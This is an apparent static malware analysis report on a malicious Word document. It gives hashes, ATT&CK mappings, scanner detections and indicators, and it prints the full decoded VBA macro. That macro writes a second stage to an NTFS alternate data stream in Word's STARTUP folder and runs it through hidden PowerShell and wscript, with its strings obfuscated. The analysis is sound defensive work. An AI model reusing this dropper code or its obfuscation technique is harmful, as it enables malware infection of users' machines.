Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 31506f24f43b4850…

MALICIOUS

Office (OOXML) / .DOCX

Size: 109.5 KB   Created: 2019-10-03 07:37:00 UTC   Authoring application: Microsoft Office Word 15.0000   First seen: 2026-06-12
MD5: c22c4b94793d98838f6a8a9673a907f7   SHA-1: 7c148f43ae49f9def4a23f6cbc4b6fc6ec087ee8   SHA-256: 31506f24f43b485082093bc00082375a2d36a2bc42d673db44e748b2ba9b064a
Risk score: 282

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic   T1059.001 PowerShell   T1059.007 JavaScript   T1564.004 NTFS File Attributes   T1204.002 Malicious File   T1105 Ingress Tool Transfer (not performed by the macro itself; see summary)

The sample is a malicious Word document whose VBA project runs from the Document_Close event handler, i.e. when a user who has enabled macros closes the file (the Document_Save handler only calls Combine_PDFs_Demo, a decoy PDF-merging routine copied with someone else's desktop paths that relies on a MergePDFs function not defined anywhere in the extracted source). Every sensitive string is assembled at run time by indexing a space-separated carrier sentence, Split(Volotea, " ")(n), so the source never contains the words it executes. Resolved, the call in Pain() is CreateObject("shell.application") followed by CallByName(..., "shellexecute", VbMethod, "powershell", <parameters>, Empty, Empty, 0), where the parameters are Start-process -FilePath "wscript" -ArgumentList @('/e:Jscript','\"<StatusBar2>\"') and the trailing 0 is ShellExecute's vShow argument (hidden window). Before that call, SetNet() draws an 11x11 grid of 2pt grey ovals as cosmetic filler and then calls WarInside(), which writes the document's own body text (ActiveDocument.Content.Text) to Application.StartupPath & "\margee:" & Application.Version. The colon makes that an NTFS alternate data stream: a host file named margee in the Word STARTUP folder with a stream named after the Office version (for example margee:16.0) holding the second stage, and wscript.exe is forced to run that stream as JScript with /e:JScript regardless of the missing extension. The macro itself contains no network code; the next stage travels inside the document text and any download would happen from that JScript, which this report does not show. The sample is therefore a dropper/loader rather than a downloader in its own right. Actionable indicators are the margee host file and its ADS in the STARTUP folder and the WINWORD.EXE -> powershell.exe -> wscript.exe process chain with a "/e:JScript" argument.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-7336299-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7336299-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA (matched on the word "shell" inside the carrier string; the actual execution is the CallByName line below, which indexes this string)
    Matched line in script
    Volotea = "The most thrue get application in test shell and some process a fear or script test it and power with execute ."
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call (resolves to CreateObject("shell.application"))
    Matched line in script
    CallByName CreateObject(Split(Volotea, " ")(7) & "." & Split(Volotea, " ")(4)), Split(Volotea, " ")(7) & Split(Volotea, " ")(20), VbMethod, Split(Volotea, " ")(18) & Split(Volotea, " ")(7), "Start-" & Split(Volotea, " ")(10) & " -FilePath ""w" & Split(Volotea, " ")(14) & """ -Argum" & "entList @('/e:J" & Split(Volotea, " ")(14) & "','\""" & StatusBar2 & """')", Empty, Empty, 0
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call (resolves to ShellExecute("powershell", "Start-process -FilePath ""wscript"" -ArgumentList @('/e:Jscript','\""<ADS path>\""')", Empty, Empty, 0))
    Matched line in script
    CallByName CreateObject(Split(Volotea, " ")(7) & "." & Split(Volotea, " ")(4)), Split(Volotea, " ")(7) & Split(Volotea, " ")(20), VbMethod, Split(Volotea, " ")(18) & Split(Volotea, " ")(7), "Start-" & Split(Volotea, " ")(10) & " -FilePath ""w" & Split(Volotea, " ")(14) & """ -Argum" & "entList @('/e:J" & Split(Volotea, " ")(14) & "','\""" & StatusBar2 & """')", Empty, Empty, 0
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All URLs below are OOXML / WordprocessingML XML namespace identifiers that occur in every Word document; they are not network indicators, and the macro carries no URL of its own.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape  In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3288 bytes
SHA-256: b9f278f0e62282c75b9119370b3f116391e541e1fe3b7a43fdee54a28c03862b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Mexa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private StatusBar2 As String

'Ok test it

Private Function WarInside()
  Dim Io_res As String, MoonCover As Integer
  Io_res = Application.StartupPath & "\" & "margee" & ":" & Application.Version
  MoonCover = FreeFile
  Open Io_res For Binary Lock Read Write As #MoonCover
  Put #MoonCover, , ActiveDocument.Content.Text
  Close #MoonCover
  StatusBar2 = Io_res
End Function


Sub SetNet()

Dim shp As Shape
Dim dWidth As Double
Dim dHeight As Double
Dim dInc As Double 'Place dots ever dInc inches (assumes 72 DPI)
Dim iIncW As Integer, iIncH As Integer
Dim i As Integer, j As Integer
Dim dDoc As Document
'----INPUT----
dInc = 0.25 'place dots every dInc inches
'-------------
 
Application.ScreenUpdating = False
Set dDoc = ActiveDocument
dWidth = dDoc.PageSetup.PageWidth
dHeight = dDoc.PageSetup.PageHeight
iIncW = 11 ' CInt(dWidth / 72 / dInc)
iIncH = 11 ' CInt(iIncW * dHeight / dWidth)
 
For i = 1 To iIncW
    For j = 1 To iIncH
        Set shp = dDoc.Shapes.AddShape(Type:=msoShapeOval, Left:=dWidth / iIncW * i, Top:=dHeight / iIncH * j, _
                       Width:=2, Height:=2)
         shp.Fill.ForeColor = RGB(215, 215, 215)
         shp.Line.Visible = msoFalse
    Next j
Next i
Set shp = Nothing
Set dDoc = Nothing
Application.ScreenUpdating = True
WarInside
End Sub

'Good

Private Function Pain(stn As Bookmark)
Dim Volotea As String
On Error Resume Next
SetNet
Volotea = "The most thrue get application in test shell and some process a fear or script test it and power with execute ."
CallByName CreateObject(Split(Volotea, " ")(7) & "." & Split(Volotea, " ")(4)), Split(Volotea, " ")(7) & Split(Volotea, " ")(20), VbMethod, Split(Volotea, " ")(18) & Split(Volotea, " ")(7), "Start-" & Split(Volotea, " ")(10) & " -FilePath ""w" & Split(Volotea, " ")(14) & """ -Argum" & "entList @('/e:J" & Split(Volotea, " ")(14) & "','\""" & StatusBar2 & """')", Empty, Empty, 0
Pain = 1
End Function

'Thank you

Private Sub MyMan()
    Dim u As Bookmark
    
    Pain u
End Sub

'Binary

Private Sub Combine_PDFs_Demo()
Dim strPDFs(0 To 2) As String
Dim bSuccess As Boolean
strPDFs(0) = "C:\Users\Ryan\Desktop\Page1.pdf"
strPDFs(1) = "C:\Users\Ryan\Desktop\Page5.pdf"
strPDFs(2) = "C:\Users\Ryan\Desktop\Page10.pdf"
 bSuccess = MergePDFs(strPDFs, "C:\Users\Ryan\Desktop\MyNewPDF.pdf")
If bSuccess = False Then MsgBox "Failed to combine all PDFs", vbCritical, "Failed to Merge PDFs"
End Sub

'Join

Private Sub Document_Close()
MyMan
End Sub



Private Sub Document_Save()
Combine_PDFs_Demo
End Sub
















Attribute VB_Name = "NewMacros"

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{F26B8EF6-FEA1-4BFE-A2BD-6A30A932AB36}{8D2C4A61-44F8-4DD7-9FE5-BDCB3E95EEE9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 25088 bytes
SHA-256: 78c0ab64af723ee3ca31b61ed3a593a64d2d146fb6f02512b4af280d7a669ef6
Detection
ClamAV: Doc.Dropper.Agent-7336299-0
Obfuscation or payload: unlikely (heuristic verdict on the raw vbaProject.bin container only; the decoded source above builds every sensitive string from Split()-indexed words of a carrier sentence, which is string-level obfuscation the container heuristic does not see)